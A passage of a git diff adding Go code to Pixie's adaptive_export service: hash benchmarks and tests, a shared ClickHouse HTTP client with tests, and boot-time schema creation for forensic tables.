+ Pod: "backend-vulnerable-779cd9d765-mxr8t-replica-shard-9",
+ Namespace: "log4j-poc-production",
+ }
+}
+
+func BenchmarkHash(b *testing.B) {
+ t := benchTarget(0)
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _ = Hash(t)
+ }
+}
+
+// BenchmarkHash_Unique varies the PID each iteration. Establishes
+// what the hash costs when the inputs aren't shared across calls (so
+// no CPU caching shortcut on the input bytes).
+func BenchmarkHash_Unique(b *testing.B) {
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _ = Hash(benchTarget(i))
+ }
+}
+
+// BenchmarkHash_LongFields pumps the fields toward their realistic
+// upper bound (~256-char Pod, ~63-char namespace per k8s DNS limits).
+// Shows whether the SHA-256 step or the writeLenPrefixed allocations
+// dominate.
+func BenchmarkHash_LongFields(b *testing.B) {
+ t := Target{
+ PID: 12345,
+ Comm: "very-long-process-name-near-kernel-limit-16chrs!",
+ Pod: "extremely-long-statefulset-pod-name-with-replica-suffix-and-shard-suffix-pushing-the-k8s-253-char-dns-limit-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
+ Namespace: "production-tenant-namespace-63-chars-aaaaaaaaaaaaaaaaaaaaaaaaa",
+ }
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _ = Hash(t)
+ }
+}
+
+// BenchmarkHash_Parallel measures contention under GOMAXPROCS
+// goroutines computing hashes in parallel. AE on a busy cluster has
+// 11 BatchWriter + 11 TableScanner streaming goroutines plus the
+// controller fan-out; if Hash's sha256.New() or its hex.EncodeToString
+// hit a shared allocator pool, parallel speedup will collapse.
+func BenchmarkHash_Parallel(b *testing.B) {
+ b.ReportAllocs()
+ b.ResetTimer()
+ var i atomic.Uint64
+ b.RunParallel(func(pb *testing.PB) {
+ for pb.Next() {
+ _ = Hash(benchTarget(int(i.Add(1))))
+ }
+ })
+}
+
+// BenchmarkHash_KubescapeReplay simulates the trigger-controller
+// fan-out: drain a batch of 10k events (the configured PollLimit
+// default) by hashing each one's target. Measures the per-batch
+// hash cost, which is paid once per trigger poll on a busy cluster.
+func BenchmarkHash_KubescapeReplay(b *testing.B) {
+ const batch = 10_000
+ targets := make([]Target, batch)
+ for i := range targets {
+ targets[i] = Target{
+ PID: uint64(1000 + i),
+ Comm: fmt.Sprintf("proc-%d", i%64),
+ Pod: fmt.Sprintf("backend-%d-7bdf99c466-replica-%d", i%32, i%4),
+ Namespace: fmt.Sprintf("ns-%d", i%8),
+ }
+ }
+ b.ResetTimer()
+ b.ReportAllocs()
+ for n := 0; n < b.N; n++ {
+ for j := range targets {
+ _ = Hash(targets[j])
+ }
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go
new file mode 100644
index 00000000000..360f3422928
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go
@@ -0,0 +1,140 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package anomaly
+
+import (
+ "reflect"
+ "testing"
+)
+
+// canonical fixture: redis CVE-2025-49844 R1005 alert (workload identity only).
+var canonicalTarget = Target{
+ PID: 106040,
+ Comm: "redis-server",
+ Pod: "redis-578d5dc9bd-kjj78",
+ Namespace: "redis",
+}
+
+// TestHash_Deterministic — same Target hashes identically every call.
+func TestHash_Deterministic(t *testing.T) {
+ a := Hash(canonicalTarget)
+ b := Hash(canonicalTarget)
+ if a != b {
+ t.Fatalf("not deterministic: %q vs %q", a, b)
+ }
+ if got := len(a); got != 32 {
+ t.Fatalf("len %d, want 32 hex chars", got)
+ }
+}
+
+// TestHash_DiffersOnPID — two processes on the same pod still hash differently
+// (we want PER-process attribution).
+func TestHash_DiffersOnPID(t *testing.T) {
+ other := canonicalTarget
+ other.PID = canonicalTarget.PID + 1
+ if Hash(canonicalTarget) == Hash(other) {
+ t.Fatalf("collision on PID change")
+ }
+}
+
+// TestHash_DiffersOnComm — different comm under same PID/pod/ns must differ.
+func TestHash_DiffersOnComm(t *testing.T) {
+ other := canonicalTarget
+ other.Comm = "redis-cli"
+ if Hash(canonicalTarget) == Hash(other) {
+ t.Fatalf("collision on Comm change")
+ }
+}
+
+// TestHash_DiffersOnPod — different replicas of same workload differ.
+func TestHash_DiffersOnPod(t *testing.T) {
+ other := canonicalTarget
+ other.Pod = "redis-578d5dc9bd-OTHER"
+ if Hash(canonicalTarget) == Hash(other) {
+ t.Fatalf("collision on Pod change")
+ }
+}
+
+// TestHash_DiffersOnNamespace — same pod name in different ns must differ.
+func TestHash_DiffersOnNamespace(t *testing.T) {
+ other := canonicalTarget
+ other.Namespace = "redis-staging"
+ if Hash(canonicalTarget) == Hash(other) {
+ t.Fatalf("collision on Namespace change")
+ }
+}
+
+// TestHash_AllowsEmptyPod — host-pid processes have no pod/namespace.
+// Hash must still be computable and stable.
+func TestHash_AllowsEmptyPod(t *testing.T) {
+ host := Target{PID: 1, Comm: "systemd"}
+ a := Hash(host)
+ b := Hash(host)
+ if a != b {
+ t.Fatalf("empty-pod hash not deterministic")
+ }
+ if len(a) != 32 {
+ t.Fatalf("empty-pod hash len %d", len(a))
+ }
+ // empty-pod target must collide with itself but not with the
+ // non-empty-pod canonical target.
+ if a == Hash(canonicalTarget) {
+ t.Fatalf("empty-pod hash collides with named-pod hash")
+ }
+}
+
+// TestHash_NoTimestampInfluence — verifies the hash function takes only
+// the four identity fields. (No EventTime / RuleID parameter exists.)
+// This is a structural test: the Target struct has exactly 4 fields,
+// all part of the canonical form. If you add a field, you must decide
+// whether it belongs in the hash and update this test.
+func TestHash_NoTimestampInfluence(t *testing.T) {
+ // Pin the shape so adding a new field (even at zero value) makes
+ // this test fail loudly. CR feedback: an equality-of-two-equal-
+ // constructions check would pass even when a new field is added,
+ // so we also assert the type's field count.
+ const wantFields = 4
+ if got := reflect.TypeOf(Target{}).NumField(); got != wantFields {
+ t.Fatalf("Target field count = %d, want %d; decide whether the new "+
+ "field belongs in the canonical hash form (update Hash + this guard)",
+ got, wantFields)
+ }
+ a := Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"}
+ if Hash(a) != Hash(Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"}) {
+ t.Fatalf("Target hash leaks an unrecognised field")
+ }
+}
+
+// TestHash_NoDelimiterCollision — naive ":"-joined canonical forms
+// collide when input values can contain ":" or be empty. The fix is a
+// length-prefixed (or otherwise delimiter-safe) encoding before hashing.
+// Without that fix, the two Targets below produce the same canonical
+// string and therefore the same hash.
+func TestHash_NoDelimiterCollision(t *testing.T) {
+ a := Target{PID: 0, Comm: "", Pod: "a:b", Namespace: ""}
+ b := Target{PID: 0, Comm: "", Pod: "a", Namespace: "b:"}
+ if Hash(a) == Hash(b) {
+ t.Fatalf("delimiter collision: %+v and %+v hash to the same value (%s)",
+ a, b, Hash(a))
+ }
+ c := Target{PID: 0, Comm: "x:y", Pod: "", Namespace: ""}
+ d := Target{PID: 0, Comm: "x", Pod: "y:", Namespace: ""}
+ if Hash(c) == Hash(d) {
+ t.Fatalf("delimiter collision: %+v and %+v hash to the same value (%s)",
+ c, d, Hash(c))
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel b/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel
new file mode 100644
index 00000000000..a52c1c89c32
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/chhttp/BUILD.bazel
@@ -0,0 +1,31 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "chhttp",
+ srcs = ["chhttp.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+)
+
+pl_go_test(
+ name = "chhttp_test",
+ srcs = ["chhttp_test.go"],
+ embed = [":chhttp"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go b/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go
new file mode 100644
index 00000000000..d96b784c7e7
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/chhttp/chhttp.go
@@ -0,0 +1,232 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package chhttp is the one HTTP client every AE-internal package uses to
+// talk to ClickHouse's HTTP interface (port 8123 by default). Previously
+// the same client was reimplemented three times (clickhouse.Applier,
+// sink.ClickHouseHTTP, trigger.ClickHouseWatermarkStore) with subtly
+// different endpoint validation, timeout defaults and error-extraction
+// logic; this package collapses that to a single implementation.
+package chhttp
+
+import (
+ "bytes"
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "strings"
+ "time"
+)
+
+// DefaultTimeout is applied when New is called with timeout<=0. Matches
+// the budget the original three clients each chose independently.
+const DefaultTimeout = 30 * time.Second
+
+// Client is a minimal HTTP CH client. Safe for concurrent use.
+type Client struct {
+ endpoint string
+ user string
+ pass string
+ hc *http.Client
+}
+
+// New validates the endpoint and returns a ready client. timeout<=0 →
+// DefaultTimeout. endpoint must be an absolute http(s) URL with no query
+// string or fragment (we append ?query=… ourselves); trailing slashes
+// are stripped so concatenations don't produce //.
+func New(endpoint, user, pass string, timeout time.Duration) (*Client, error) {
+ if endpoint == "" {
+ return nil, fmt.Errorf("chhttp: empty endpoint")
+ }
+ u, err := url.Parse(endpoint)
+ if err != nil {
+ return nil, fmt.Errorf("chhttp: invalid endpoint %q: %w", endpoint, err)
+ }
+ if (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" {
+ return nil, fmt.Errorf("chhttp: endpoint must be an absolute http(s) URL: %q", endpoint)
+ }
+ if u.RawQuery != "" || u.Fragment != "" {
+ return nil, fmt.Errorf("chhttp: endpoint must not include query parameters or a fragment: %q", endpoint)
+ }
+ if timeout <= 0 {
+ timeout = DefaultTimeout
+ }
+ return &Client{
+ endpoint: strings.TrimRight(endpoint, "/"),
+ user: user,
+ pass: pass,
+ hc: &http.Client{Timeout: timeout},
+ }, nil
+}
+
+// Endpoint returns the (validated, trimmed) base URL — useful for log
+// fields where the caller wants to identify which CH the client targets.
+func (c *Client) Endpoint() string { return c.endpoint }
+
+// Exec POSTs sql as the request body (DDL / DML without source data). Returns
+// the response body bytes. Use for CREATE DATABASE, CREATE TABLE, etc.
+func (c *Client) Exec(ctx context.Context, sql string) ([]byte, error) {
+ return c.do(ctx, http.MethodPost, c.endpoint+"/", strings.NewReader(sql), "")
+}
+
+// Query GETs sql via ?query= so it shows up greppable in CH's query log.
+// Use for SELECT — the body is whatever FORMAT was requested. Buffers
+// the entire response in memory; for large result sets prefer
+// QueryStream.
+func (c *Client) Query(ctx context.Context, sql string) ([]byte, error) {
+ q := url.Values{}
+ q.Set("query", sql)
+ return c.do(ctx, http.MethodGet, c.endpoint+"/?"+q.Encode(), nil, "")
+}
+
+// QueryStream GETs sql like Query, but returns the response body as an
+// io.ReadCloser the caller drains incrementally. Use for SELECTs whose
+// result set is unbounded (e.g. an active-set rehydrate that may be
+// multi-MB). Caller MUST Close a non-nil body; on error the body is nil.
+func (c *Client) QueryStream(ctx context.Context, sql string) (io.ReadCloser, error) {
+ q := url.Values{}
+ q.Set("query", sql)
+ req, err := http.NewRequestWithContext(ctx, http.MethodGet, c.endpoint+"/?"+q.Encode(), nil)
+ if err != nil {
+ return nil, err
+ }
+ if c.user != "" {
+ req.SetBasicAuth(c.user, c.pass)
+ }
+ resp, err := c.hc.Do(req)
+ if err != nil {
+ return nil, err
+ }
+ if resp.StatusCode/100 != 2 {
+ msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ resp.Body.Close()
+ return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg)))
+ }
+ return resp.Body, nil
+}
+
+// InsertOptions tunes one Insert call.
+type InsertOptions struct {
+ // ContentType sets the HTTP Content-Type. Defaults to
+ // "application/x-ndjson" when empty (matches FORMAT JSONEachRow).
+ ContentType string
+ // FailLoud, when true, attaches the CH settings that turn silent
+ // drops into errors (input_format_skip_unknown_fields=0 etc.) —
+ // see setFailLoudSettings.
+ FailLoud bool
+ // Settings carries additional CH settings as URL params on the
+ // query string. Keys are passed through unchanged.
+ Settings url.Values
+}
+
+// InsertResult is what Insert returns on success.
+type InsertResult struct {
+ // Summary is the X-ClickHouse-Summary response header verbatim (may
+ // be empty — older CH or middlebox stripping). Callers parse for
+ // silent-drop detection.
+ Summary string
+ // BodyBytes is the count of bytes in the request body (not the
+ // response). Convenient for logging the wire size at the call site.
+ BodyBytes int
+}
+
+// Insert posts the body for an INSERT … FORMAT X statement (sql contains
+// the statement; body contains the data in the named format). The
+// per-call options carry content-type + the fail-loud setting.
+func (c *Client) Insert(ctx context.Context, sql string, body []byte, opts InsertOptions) (InsertResult, error) {
+ q := url.Values{}
+ q.Set("query", sql)
+ for k, vs := range opts.Settings {
+ for _, v := range vs {
+ q.Add(k, v)
+ }
+ }
+ if opts.FailLoud {
+ setFailLoudSettings(q)
+ }
+ ct := opts.ContentType
+ if ct == "" {
+ ct = "application/x-ndjson"
+ }
+ out, resp, err := c.doRaw(ctx, http.MethodPost, c.endpoint+"/?"+q.Encode(), bytes.NewReader(body), ct)
+ if err != nil {
+ return InsertResult{}, err
+ }
+ _ = out // discarded: INSERT bodies are empty
+ return InsertResult{
+ Summary: resp.Header.Get("X-ClickHouse-Summary"),
+ BodyBytes: len(body),
+ }, nil
+}
+
+// do is the simple variant used by Exec/Query — it discards the response
+// headers and only surfaces the body bytes.
+func (c *Client) do(ctx context.Context, method, urlStr string, body io.Reader, contentType string) ([]byte, error) {
+ out, _, err := c.doRaw(ctx, method, urlStr, body, contentType)
+ return out, err
+}
+
+// doRaw builds + sends one request, returning the fully-read body and the
+// response (its Body is already closed; it is returned so Insert can read
+// the X-ClickHouse-Summary header). Non-2xx becomes a formatted Go error.
+func (c *Client) doRaw(ctx context.Context, method, urlStr string, body io.Reader, contentType string) ([]byte, *http.Response, error) {
+ req, err := http.NewRequestWithContext(ctx, method, urlStr, body)
+ if err != nil {
+ return nil, nil, err
+ }
+ if contentType != "" {
+ req.Header.Set("Content-Type", contentType)
+ }
+ if c.user != "" {
+ req.SetBasicAuth(c.user, c.pass)
+ }
+ resp, err := c.hc.Do(req)
+ if err != nil {
+ return nil, nil, err
+ }
+ defer resp.Body.Close()
+ if resp.StatusCode/100 != 2 {
+ msg, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ return nil, resp, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(msg)))
+ }
+ out, err := io.ReadAll(resp.Body)
+ if err != nil {
+ return nil, resp, err
+ }
+ return out, resp, nil
+}
+
+// setFailLoudSettings pins ClickHouse's input-format settings on an
+// INSERT sent with FailLoud so an upstream schema-drift surfaces as an HTTP 4xx with a real
+// error body, not a silent written_rows=0 + 200 OK that downstream
+// silent-drop detection only catches after the data is lost.
+//
+// input_format_skip_unknown_fields=0 fail on a column we write that
+// doesn't exist in CH.
+// input_format_null_as_default=0 fail on a NULL where the
+// column is non-nullable.
+// input_format_allow_errors_num=0 reject the whole batch on
+// the first parse error.
+// input_format_allow_errors_ratio=0 same, for the proportional
+// knob.
+func setFailLoudSettings(q url.Values) {
+ q.Set("input_format_skip_unknown_fields", "0")
+ q.Set("input_format_null_as_default", "0")
+ q.Set("input_format_allow_errors_num", "0")
+ q.Set("input_format_allow_errors_ratio", "0")
+}
diff --git a/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go b/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go
new file mode 100644
index 00000000000..28664911a14
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/chhttp/chhttp_test.go
@@ -0,0 +1,184 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package chhttp
+
+import (
+ "context"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "testing"
+ "time"
+)
+
+func TestNew_RejectsBadEndpoints(t *testing.T) {
+ for _, tc := range []struct {
+ name, ep string
+ }{
+ {"empty", ""},
+ {"no-scheme", "localhost:8123"},
+ {"unsupported-scheme", "ftp://localhost:8123"},
+ {"has-query", "http://localhost:8123/?foo=bar"},
+ {"has-fragment", "http://localhost:8123/#bar"},
+ } {
+ t.Run(tc.name, func(t *testing.T) {
+ if _, err := New(tc.ep, "", "", 0); err == nil {
+ t.Fatalf("New(%q) = nil err, want error", tc.ep)
+ }
+ })
+ }
+}
+
+func TestNew_DefaultsTimeout(t *testing.T) {
+ c, err := New("http://localhost:8123", "", "", 0)
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ if c.hc.Timeout != DefaultTimeout {
+ t.Fatalf("timeout = %v, want %v", c.hc.Timeout, DefaultTimeout)
+ }
+}
+
+func TestNew_StripsTrailingSlashFromEndpoint(t *testing.T) {
+ c, err := New("http://localhost:8123/", "", "", 0)
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ if c.Endpoint() != "http://localhost:8123" {
+ t.Fatalf("endpoint = %q, want trimmed", c.Endpoint())
+ }
+}
+
+func TestExec_PostsSQLAsBody(t *testing.T) {
+ var gotBody string
+ var gotMethod string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotMethod = r.Method
+ b, _ := io.ReadAll(r.Body)
+ gotBody = string(b)
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+
+ c, err := New(srv.URL, "", "", time.Second)
+ if err != nil {
+ t.Fatalf("New: %v", err)
+ }
+ if _, err := c.Exec(context.Background(), "CREATE DATABASE x"); err != nil {
+ t.Fatalf("Exec: %v", err)
+ }
+ if gotMethod != http.MethodPost {
+ t.Fatalf("method = %q, want POST", gotMethod)
+ }
+ if gotBody != "CREATE DATABASE x" {
+ t.Fatalf("body = %q, want %q", gotBody, "CREATE DATABASE x")
+ }
+}
+
+func TestQuery_PutsSQLInURLParam(t *testing.T) {
+ var gotMethod, gotQuery string
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotMethod = r.Method
+ gotQuery = r.URL.Query().Get("query")
+ _, _ = w.Write([]byte(`{"hits":1}` + "\n"))
+ }))
+ defer srv.Close()
+
+ c, _ := New(srv.URL, "", "", time.Second)
+ body, err := c.Query(context.Background(), "SELECT 1")
+ if err != nil {
+ t.Fatalf("Query: %v", err)
+ }
+ if gotMethod != http.MethodGet {
+ t.Fatalf("method = %q, want GET", gotMethod)
+ }
+ if gotQuery != "SELECT 1" {
+ t.Fatalf("query = %q, want %q", gotQuery, "SELECT 1")
+ }
+ if !strings.Contains(string(body), "hits") {
+ t.Fatalf("body = %q", body)
+ }
+}
+
+func TestInsert_SetsContentTypeAndFailLoud(t *testing.T) {
+ var gotCT, gotQ string
+ gotSettings := map[string]string{}
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotCT = r.Header.Get("Content-Type")
+ gotQ = r.URL.Query().Get("query")
+ for _, k := range []string{"input_format_skip_unknown_fields", "input_format_null_as_default", "input_format_allow_errors_num", "input_format_allow_errors_ratio"} {
+ gotSettings[k] = r.URL.Query().Get(k)
+ }
+ w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"3"}`)
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+
+ c, _ := New(srv.URL, "", "", time.Second)
+ res, err := c.Insert(context.Background(),
+ "INSERT INTO t FORMAT JSONEachRow", []byte("{}\n"),
+ InsertOptions{FailLoud: true})
+ if err != nil {
+ t.Fatalf("Insert: %v", err)
+ }
+ if gotCT != "application/x-ndjson" {
+ t.Fatalf("content-type = %q", gotCT)
+ }
+ if gotQ != "INSERT INTO t FORMAT JSONEachRow" {
+ t.Fatalf("query = %q", gotQ)
+ }
+ if gotSettings["input_format_skip_unknown_fields"] != "0" {
+ t.Fatalf("fail-loud not applied: %v", gotSettings)
+ }
+ if res.Summary != `{"written_rows":"3"}` {
+ t.Fatalf("summary = %q", res.Summary)
+ }
+ if res.BodyBytes != 3 {
+ t.Fatalf("body bytes = %d", res.BodyBytes)
+ }
+}
+
+func TestExec_PropagatesNon2xx(t *testing.T) {
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ w.WriteHeader(http.StatusBadRequest)
+ _, _ = w.Write([]byte("syntax error near 'GROOT'"))
+ }))
+ defer srv.Close()
+ c, _ := New(srv.URL, "", "", time.Second)
+ _, err := c.Exec(context.Background(), "GROOT")
+ if err == nil || !strings.Contains(err.Error(), "HTTP 400") || !strings.Contains(err.Error(), "syntax error") {
+ t.Fatalf("err = %v", err)
+ }
+}
+
+func TestExec_SendsBasicAuth(t *testing.T) {
+ var gotUser, gotPass string
+ var hadAuth bool
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ gotUser, gotPass, hadAuth = r.BasicAuth()
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+ c, _ := New(srv.URL, "default", "s3cret", time.Second)
+ if _, err := c.Exec(context.Background(), "SELECT 1"); err != nil {
+ t.Fatalf("Exec: %v", err)
+ }
+ if !hadAuth || gotUser != "default" || gotPass != "s3cret" {
+ t.Fatalf("basic auth: had=%v user=%q pass=%q", hadAuth, gotUser, gotPass)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel
new file mode 100644
index 00000000000..b83bc98cad7
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel
@@ -0,0 +1,44 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "clickhouse",
+ srcs = [
+ "apply.go",
+ "ddl.go",
+ "insert.go",
+ ],
+ embedsrcs = ["schema.sql"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/chhttp",
+ ],
+)
+
+pl_go_test(
+ name = "clickhouse_test",
+ srcs = [
+ "apply_test.go",
+ "columns_test.go",
+ "ddl_test.go",
+ "insert_test.go",
+ ],
+ embed = [":clickhouse"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
new file mode 100644
index 00000000000..84b3afbbcb0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go
@@ -0,0 +1,252 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "fmt"
+ "strings"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp"
+)
+
+// OperatorOwnedTables is the subset of KnownTables the adaptive_export
+// operator creates on boot, in creation order. Kubescape tables (alerts,
+// kubescape_logs) are NOT here — they are owned by the
+// soc/tree/clickhouse-lab installer. Order matters: pixie observation
+// tables first, then the operator's own write targets, and the
+// dx_attack_graph_malicious VIEW after the dx_attack_graph table it reads.
+var OperatorOwnedTables = []string{
+	// 12 pixie socket_tracer tables — created BEFORE Pixie's retention
+	// plugin gets a chance to auto-DDL them (which would omit our
+	// namespace + pod columns and break analyst JOINs).
+	"http_events",
+	"http2_messages.beta",
+	"dns_events",
+	"redis_events",
+	"mysql_events",
+	"pgsql_events",
+	"cql_events",
+	"mongodb_events",
+	"kafka_events.beta",
+	"amqp_events",
+	"mux_events",
+	"tls_events",
+	// conn_stats — pixie observation table; created in the
+	// same boot pass as the others so Apply (here) and Verify (KnownTables
+	// in ddl.go) can't drift. The drift was a real regression: aeprod3/4/5
+	// shipped with this list at 14 entries while ddl.go's KnownTables had 15,
+	// so Apply created 14 tables on fresh install and Verify failed at boot
+	// with "conn_stats schema drift, missing columns". Locked down by
+	// TestOperatorOwnedTables_CoversAllPixieTables in apply_test.go.
+	"conn_stats",
+	// operator's write targets.
+	"adaptive_attribution",
+	"trigger_watermark",
+	// per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). Created on
+	// boot so a reconcile run has a target without manual DDL. Not a pixie
+	// table → not in PixieTables(), so VerifyPixieSchema ignores it.
+	"ae_reconcile",
+	// dx evidence-graph edge list — created on boot so the Pixie
+	// dx_evidence_graph UI (px.DataFrame clickhouse_dsn) has a real,
+	// globally-registered table to read. dx emits edges, AE persists.
+	// Not a pixie socket_tracer table → not in PixieTables().
+	"dx_attack_graph",
+	// rule-ins-only VIEW over dx_attack_graph; created AFTER it (depends on it).
+	"dx_attack_graph_malicious",
+}
+
+// Applier applies operator-owned DDL to a ClickHouse cluster over the
+// HTTP interface (default 8123). Used at boot.
+type Applier struct {
+	c *chhttp.Client // client used for the Exec, Query and Insert calls below
+}
+
+// NewApplier builds an Applier for endpoint; chhttp.New errors come back wrapped.
+func NewApplier(endpoint, user, pass string) (*Applier, error) {
+	client, err := chhttp.New(endpoint, user, pass, 0)
+	if err != nil {
+		return nil, fmt.Errorf("clickhouse: %w", err)
+	}
+	return &Applier{c: client}, nil
+}
+
+// Apply creates the forensic_db database if it is missing, then executes
+// the canonical DDL of every OperatorOwnedTables entry in declared order.
+// All statements are IF NOT EXISTS forms, so re-running Apply is safe.
+// The first failure is returned (wrapped) and nothing further is attempted —
+// callers should treat schema apply as a precondition for the rest of boot.
+func (a *Applier) Apply(ctx context.Context) error {
+	if dbErr := a.execute(ctx, "CREATE DATABASE IF NOT EXISTS forensic_db"); dbErr != nil {
+		return fmt.Errorf("apply: create database forensic_db: %w", dbErr)
+	}
+	for _, name := range OperatorOwnedTables {
+		stmt, err := DDL(name)
+		if err != nil {
+			return fmt.Errorf("apply: get DDL for %s: %w", name, err)
+		}
+		if err = a.execute(ctx, stmt); err != nil {
+			return fmt.Errorf("apply: create %s: %w", name, err)
+		}
+	}
+	return nil
+}
+
+// WriteAttackGraph inserts dx evidence-graph edges into
+// forensic_db.dx_attack_graph. jsonEachRow is newline-delimited JSON objects
+// keyed by column name (JSONEachRow; unknown keys are skipped, missing
+// columns default). Empty input is a no-op: nil is returned, nothing is sent.
+func (a *Applier) WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error {
+	if len(jsonEachRow) > 0 {
+		const stmt = "INSERT INTO forensic_db.dx_attack_graph FORMAT JSONEachRow"
